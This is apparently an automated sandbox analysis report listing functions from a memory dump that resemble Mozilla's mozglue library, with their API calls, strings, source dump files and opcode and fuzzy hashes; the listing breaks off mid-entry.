Instruction Fuzzy Hash: F27159B5A047068FCB25CF28C481956BBF1FF8A3247544AA9E85ACB7A0D771F841CF91

Function 665EB790 Relevance: 10.6, APIs: 7, Instructions: 147COMMON

Download Yara Rule

APIs

?good@ios_base@std@@QBE_NXZ.MSVCP140(?,6662CC83,?,?,?,?,?,?,?,?,?,6662BCAE,?,?,6661DC2C), ref: 665EB7E6
?good@ios_base@std@@QBE_NXZ.MSVCP140(?,6662CC83,?,?,?,?,?,?,?,?,?,6662BCAE,?,?,6661DC2C), ref: 665EB80C
?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(?,00000000,?,6662CC83,?,?,?,?,?,?,?,?,?,6662BCAE), ref: 665EB88E
?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP140(?,6662CC83,?,?,?,?,?,?,?,?,?,6662BCAE,?,?,6661DC2C), ref: 665EB896

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: ?good@ios_base@std@@D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@Osfx@?$basic_ostream@
String ID:
API String ID: 922945588-0
Opcode ID: 4b449623bd75eaefb985c625bbc1f0ebc19d82197dd7346a472eb76c08ebbfcd
Instruction ID: 877d7a35be154770d82f80303ed7c0b58b4ab8f0fea480a1334c2569bbec3986
Opcode Fuzzy Hash: 4b449623bd75eaefb985c625bbc1f0ebc19d82197dd7346a472eb76c08ebbfcd
Instruction Fuzzy Hash: 6F518735B042118FDB24DF19C695A2ABBF6FF98315B59895DEA8A97341C731E801CF80

Function 66614AD0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 139stringCOMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,?,80000000,?,66614AB7,?,665D43CF,?,665D42D2), ref: 66614B48
free.MOZGLUE(?,?,?,80000000,?,66614AB7,?,665D43CF,?,665D42D2), ref: 66614B7F
memcpy.VCRUNTIME140(00000000,?,?,80000000,?,66614AB7,?,665D43CF,?,665D42D2), ref: 66614B94
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,66614AB7,?,665D43CF,?,665D42D2), ref: 66614BBC
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,pid:,00000004,?,?,?,66614AB7,?,665D43CF,?,665D42D2), ref: 66614BEE

Strings

pid:, xrefs: 66614BE8

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: memcpy$_invalid_parameter_noinfo_noreturnfreestrncmp
String ID: pid:
API String ID: 1916652239-3403741246
Opcode ID: 15d4b498923085b105f6fa377baddce11c392a41d9688fb852e642bdc808b8f4
Instruction ID: 67c96ab2d5d1927ced116aac0bbf01613196b7710746ddd0f008e8c9b6a22a54
Opcode Fuzzy Hash: 15d4b498923085b105f6fa377baddce11c392a41d9688fb852e642bdc808b8f4
Instruction Fuzzy Hash: DE410971B042559BCB14CFBCFC80A9FBBEAAF85228B144638E965D7381DB709904C7A5

Function 66621D00 Relevance: 10.6, APIs: 7, Instructions: 115threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 66621D0F
AcquireSRWLockExclusive.KERNEL32(?,?,66621BE3,?,?,66621D96,00000000), ref: 66621D18
ReleaseSRWLockExclusive.KERNEL32(?,?,66621BE3,?,?,66621D96,00000000), ref: 66621D4C
GetCurrentThreadId.KERNEL32 ref: 66621DB7
AcquireSRWLockExclusive.KERNEL32(?), ref: 66621DC0
ReleaseSRWLockExclusive.KERNEL32(?), ref: 66621DDA

Part of subcall function 66621EF0: GetCurrentThreadId.KERNEL32 ref: 66621F03
Part of subcall function 66621EF0: AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,66621DF2,00000000,00000000), ref: 66621F0C
Part of subcall function 66621EF0: ReleaseSRWLockExclusive.KERNEL32 ref: 66621F20

moz_xmalloc.MOZGLUE(00000008,00000000,00000000), ref: 66621DF4

Part of subcall function 665ECA10: malloc.MOZGLUE(?), ref: 665ECA26

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$mallocmoz_xmalloc
String ID:
API String ID: 1880959753-0
Opcode ID: e156c6fe3fb939258ff1c36f88a726fc9bb0d2320f81ca7f93cec599a23413e1
Instruction ID: 8e56d0c4c0d4cf162394b25eefe9a1a6ff9eaae8646857edcceacdaf3f1df98a
Opcode Fuzzy Hash: e156c6fe3fb939258ff1c36f88a726fc9bb0d2320f81ca7f93cec599a23413e1
Instruction Fuzzy Hash: FB4188B5604701DFCB14CF29E899A56BBEAFF89314F10442EEA9A87741CB31F854CB91

Function 6661D210 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 115stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,665E5820,?), ref: 6661D21F
moz_xmalloc.MOZGLUE(00000001,?,?,665E5820,?), ref: 6661D22E

Part of subcall function 665ECA10: malloc.MOZGLUE(?), ref: 665ECA26

memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,665E5820,?), ref: 6661D242
free.MOZGLUE(00000000,?,?,?,?,?,?,665E5820,?), ref: 6661D253

Part of subcall function 665F5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 665F5EDB
Part of subcall function 665F5E90: memset.VCRUNTIME140(ewcf,000000E5,?), ref: 665F5F27
Part of subcall function 665F5E90: LeaveCriticalSection.KERNEL32(?), ref: 665F5FB2

memcpy.VCRUNTIME140(00000000,00000000,?,?,?,?,?,?,?,665E5820,?), ref: 6661D280

Strings

X^f, xrefs: 6661D23C, 6661D29E, 6661D2E3

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: CriticalSectionmemset$EnterLeavefreemallocmemcpymoz_xmallocstrlen
String ID: X^f
API String ID: 2029485308-1664138141
Opcode ID: e15a8039327653ac0bf0bc5dcbe34a5d3d2e55a86883a3c758bf08f3134e168a
Instruction ID: 96621b53ec2e9cafa6a750fc363a35401bf326c79112b897400f0c0a2f785e8e
Opcode Fuzzy Hash: e15a8039327653ac0bf0bc5dcbe34a5d3d2e55a86883a3c758bf08f3134e168a
Instruction Fuzzy Hash: 3D31F4B5D042159BDB00CF5CD880AAEFBB5AF9A344F244069DA24AB301D372EC02CBE1

Function 665E38A0 Relevance: 10.6, APIs: 7, Instructions: 80memoryCOMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(6665E220,?,?,?,?,665E3899,?), ref: 665E38B2
ReleaseSRWLockExclusive.KERNEL32(6665E220,?,?,?,665E3899,?), ref: 665E38C3
free.MOZGLUE(00000000,?,?,?,665E3899,?), ref: 665E38F1
RtlFreeHeap.NTDLL(?,00000000,?), ref: 665E3920
RtlFreeUnicodeString.NTDLL(-0000000C,?,?,?,665E3899,?), ref: 665E392F
RtlFreeUnicodeString.NTDLL(-00000014,?,?,?,665E3899,?), ref: 665E3943
RtlFreeHeap.NTDLL(?,00000000,0000002C), ref: 665E396E

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: Free$ExclusiveHeapLockStringUnicode$AcquireReleasefree
String ID:
API String ID: 3047341122-0
Opcode ID: b7f5657e57593d45781411d8b55524635ce5ad5999c9ecc03ca9e362079e3df2
Instruction ID: 4a57f03a8a440286b15213d61dc77f41cbd6865e11abf179fa332f8ebda1dff1
Opcode Fuzzy Hash: b7f5657e57593d45781411d8b55524635ce5ad5999c9ecc03ca9e362079e3df2
Instruction Fuzzy Hash: 3E210272A00620DFEB20DF15DC81B56BBAAEF85324F158469E95AD7320CB31EC45CF90

Function 666184E0 Relevance: 10.6, APIs: 7, Instructions: 79COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 666184F3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6661850A
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6661851E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6661855B
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6661856F
??1UniqueJSONStrings@baseprofiler@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 666185AC

Part of subcall function 66617670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,666185B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6661767F
Part of subcall function 66617670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,666185B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 66617693
Part of subcall function 66617670: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,666185B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 666176A7

free.MOZGLUE(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 666185B2

Part of subcall function 665F5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 665F5EDB
Part of subcall function 665F5E90: memset.VCRUNTIME140(ewcf,000000E5,?), ref: 665F5F27
Part of subcall function 665F5E90: LeaveCriticalSection.KERNEL32(?), ref: 665F5FB2

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: free$CriticalSection$EnterLeaveStrings@baseprofiler@mozilla@@Uniquememset
String ID:
API String ID: 2666944752-0
Opcode ID: 3419d143086f67abd00113a8f66fb41a08f20458170ac6c47a36b274be611fe2
Instruction ID: adf9624b4fb146fa583f7349a10f2207958c6cecda6fbfa30f096ee99d774471
Opcode Fuzzy Hash: 3419d143086f67abd00113a8f66fb41a08f20458170ac6c47a36b274be611fe2
Instruction Fuzzy Hash: 702192B46046019FDB14CF29E888A6ABBA6FFC4309F14482CE65BC3751DB31F958CB91

Function 665F5B50 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 78COMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,665F56EE,?,00000001), ref: 665F5B85
EnterCriticalSection.KERNEL32(6665F688,?,?,?,665F56EE,?,00000001), ref: 665F5B90
LeaveCriticalSection.KERNEL32(6665F688,?,?,?,665F56EE,?,00000001), ref: 665F5BD8
GetTickCount64.KERNEL32 ref: 665F5BE4

Strings

V_f, xrefs: 665F5B5C
V_f, xrefs: 665F5C35

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: CriticalSection$Count64CounterEnterLeavePerformanceQueryTick
String ID: V_f$V_f
API String ID: 2796706680-1261511381
Opcode ID: 85985cbb19463d8711a6e19fbe4e9b940b229202bcc3def0a00e3e554a9ccb35
Instruction ID: 0bb94fc54574c70a32723f96cb5a23541508ccd61ac5c9f3079f8e9c99a4de26
Opcode Fuzzy Hash: 85985cbb19463d8711a6e19fbe4e9b940b229202bcc3def0a00e3e554a9ccb35
Instruction Fuzzy Hash: 732194756047549FCB08DF6AE45655ABBE7EBCA210F04C82EE69A87390DB30A804CF41

Function 665E1640 Relevance: 10.6, APIs: 7, Instructions: 77COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,00000000,00000114), ref: 665E1699
VerSetConditionMask.NTDLL ref: 665E16CB
VerSetConditionMask.NTDLL ref: 665E16D7
VerSetConditionMask.NTDLL ref: 665E16DE
VerSetConditionMask.NTDLL ref: 665E16E5
VerSetConditionMask.NTDLL ref: 665E16EC
VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 665E16F9

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: ConditionMask$InfoVerifyVersionmemset
String ID:
API String ID: 375572348-0
Opcode ID: 5d32702ab86bf07ae6dd67c63760d31d3b0d345502b67c9b8aa05a218efe348a
Instruction ID: cc3c083e4b31e820e3a783dc0de3b7f720bd75b895a739c5967685466e4e9bc0
Opcode Fuzzy Hash: 5d32702ab86bf07ae6dd67c63760d31d3b0d345502b67c9b8aa05a218efe348a
Instruction Fuzzy Hash: 0021E4B07402186BFB20AB65EC86FBBB76DEFC6704F004528F6059B1C0CA759D54CBA1

Function 6662D1D0 Relevance: 10.6, APIs: 7, Instructions: 74threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6662D1EC
AcquireSRWLockExclusive.KERNEL32(?), ref: 6662D1F5

Part of subcall function 6662AD40: moz_malloc_usable_size.MOZGLUE(?), ref: 6662AE20

ReleaseSRWLockExclusive.KERNEL32(?), ref: 6662D211
GetCurrentThreadId.KERNEL32 ref: 6662D217
AcquireSRWLockExclusive.KERNEL32(?), ref: 6662D226
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6662D279
free.MOZGLUE(?), ref: 6662D2B2

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$freemoz_malloc_usable_size
String ID:
API String ID: 3049780610-0
Opcode ID: 282b752a953af86745921a33cd92c8f3df857984a7d6070216ce0fd3a6078e67
Instruction ID: 51753a7693181d04707a5d366eb5dcda2d34bea1bad5a51505e9d7ca11506e86
Opcode Fuzzy Hash: 282b752a953af86745921a33cd92c8f3df857984a7d6070216ce0fd3a6078e67
Instruction Fuzzy Hash: 8921B171604301DFCB04DF25D888A9EBBB6FFCA324F10462EE61687340DB30A805CB96

Function 6661F5B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 70threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6660CBE8: GetCurrentProcess.KERNEL32(?,665D31A7), ref: 6660CBF1
Part of subcall function 6660CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,665D31A7), ref: 6660CBFA

Part of subcall function 66619420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,665E4A68), ref: 6661945E
Part of subcall function 66619420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 66619470
Part of subcall function 66619420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 66619482
Part of subcall function 66619420: __Init_thread_footer.LIBCMT ref: 6661949F

GetCurrentThreadId.KERNEL32 ref: 6661F619
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6661F598), ref: 6661F621

Part of subcall function 666194D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 666194EE
Part of subcall function 666194D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 66619508

GetCurrentThreadId.KERNEL32 ref: 6661F637
AcquireSRWLockExclusive.KERNEL32(6665F4B8,?,?,00000000,?,6661F598), ref: 6661F645
ReleaseSRWLockExclusive.KERNEL32(6665F4B8,?,?,00000000,?,6661F598), ref: 6661F663

Strings

[D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6661F62A

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: Currentgetenv$ExclusiveLockProcessThread$AcquireInit_thread_footerReleaseTerminate__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
API String ID: 1579816589-753366533
Opcode ID: 95d0ac80afc84af11bd90d2209122e072cbcdb5ff058ec480340c45e20e48507
Instruction ID: 5e86c99930b993d70a5d169cbce112e4b994fbf33d65a983752e25cd9dc35064
Opcode Fuzzy Hash: 95d0ac80afc84af11bd90d2209122e072cbcdb5ff058ec480340c45e20e48507
Instruction Fuzzy Hash: 1111A375104215ABCB44EF5EF9459A5BBAFFFC63A8B440015EB0583B42CB71A821CFA0

Function 665E2070 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 68libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6660AB89: EnterCriticalSection.KERNEL32(6665E370,?,?,?,665D34DE,6665F6CC,?,?,?,?,?,?,?,665D3284), ref: 6660AB94
Part of subcall function 6660AB89: LeaveCriticalSection.KERNEL32(6665E370,?,665D34DE,6665F6CC,?,?,?,?,?,?,?,665D3284,?,?,665F56F6), ref: 6660ABD1

LoadLibraryW.KERNEL32(combase.dll,665E1C5F), ref: 665E20AE
GetProcAddress.KERNEL32(00000000,CoInitializeSecurity), ref: 665E20CD
__Init_thread_footer.LIBCMT ref: 665E20E1
FreeLibrary.KERNEL32 ref: 665E2124

Strings

CoInitializeSecurity, xrefs: 665E20C7
combase.dll, xrefs: 665E20A9

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
String ID: CoInitializeSecurity$combase.dll
API String ID: 4190559335-2476802802
Opcode ID: a4c4512a5f8b99d94b1b19c272c4043a78f07f5a27b23bc4e7fc475c5a2f6e06
Instruction ID: 4bde0c9cb435ffc1c6013553c9b1c94dbf0073d1551618a5df228787f01bf72a
Opcode Fuzzy Hash: a4c4512a5f8b99d94b1b19c272c4043a78f07f5a27b23bc4e7fc475c5a2f6e06
Instruction Fuzzy Hash: 3D21577640025AABDF15DF96EC4AD9A3F67FBDA365F108024FB0592290D3329861CFA0

Function 666376C0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32 ref: 666376F2
moz_xmalloc.MOZGLUE(00000001), ref: 66637705

Part of subcall function 665ECA10: malloc.MOZGLUE(?), ref: 665ECA26

memset.VCRUNTIME140(00000000,00000000,00000001), ref: 66637717
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,6663778F,00000000,00000000,00000000,00000000), ref: 66637731
free.MOZGLUE(00000000), ref: 66637760

Strings

}>af, xrefs: 666376C4

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: ByteCharMultiWide$freemallocmemsetmoz_xmalloc
String ID: }>af
API String ID: 2538299546-1322512716
Opcode ID: 43d3cb2aa5687062ed422316b72338416a88d3e727446c1f95ea23850b41022f
Instruction ID: 0f70d2701ea5ed65cdc395a96fb49cf1a3158e0a900e12d6639c16842eaf7064
Opcode Fuzzy Hash: 43d3cb2aa5687062ed422316b72338416a88d3e727446c1f95ea23850b41022f
Instruction Fuzzy Hash: D311B6B1D00325ABE7109F769C44B6B7EF8EF85354F045429F888A7200E7709840C7E2

Function 666199A0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62threadCOMMON

Download Yara Rule

APIs

Part of subcall function 66619420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,665E4A68), ref: 6661945E
Part of subcall function 66619420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 66619470
Part of subcall function 66619420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 66619482
Part of subcall function 66619420: __Init_thread_footer.LIBCMT ref: 6661949F

GetCurrentThreadId.KERNEL32 ref: 666199C1
AcquireSRWLockExclusive.KERNEL32(6665F4B8), ref: 666199CE
ReleaseSRWLockExclusive.KERNEL32(6665F4B8), ref: 666199F8
GetCurrentThreadId.KERNEL32 ref: 66619A05
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 66619A0D

Part of subcall function 66619A60: GetCurrentThreadId.KERNEL32 ref: 66619A95
Part of subcall function 66619A60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 66619A9D
Part of subcall function 66619A60: ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 66619ACC
Part of subcall function 66619A60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 66619BA7
Part of subcall function 66619A60: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 66619BB8
Part of subcall function 66619A60: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 66619BC9

Part of subcall function 6660CBE8: GetCurrentProcess.KERNEL32(?,665D31A7), ref: 6660CBF1
Part of subcall function 6660CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,665D31A7), ref: 6660CBFA

Strings

[I %d/%d] profiler_stream_json_for_this_process, xrefs: 66619A15

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: Current$ThreadTimegetenv$ExclusiveLockProcessStampV01@@Value@mozilla@@_getpid$?profiler_time@baseprofiler@mozilla@@AcquireInit_thread_footerNow@ReleaseStamp@mozilla@@TerminateV12@_
String ID: [I %d/%d] profiler_stream_json_for_this_process
API String ID: 2359002670-141131661
Opcode ID: 9da9120079519f8fc462402290b9c3d5d175ecb1b28648c9d4eae11108cf8643
Instruction ID: 962b286f1fdecafafb3d8a10247701d457ba1738c8d972eed916b3699a2fca47
Opcode Fuzzy Hash: 9da9120079519f8fc462402290b9c3d5d175ecb1b28648c9d4eae11108cf8643
Instruction Fuzzy Hash: 070104358081749FDB019F2AF81A67ABF7BEBC265DF094216EE4593342D7344814CBA1

Function 665E1FA0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 60libraryloaderCOMMON

Download Yara Rule

APIs

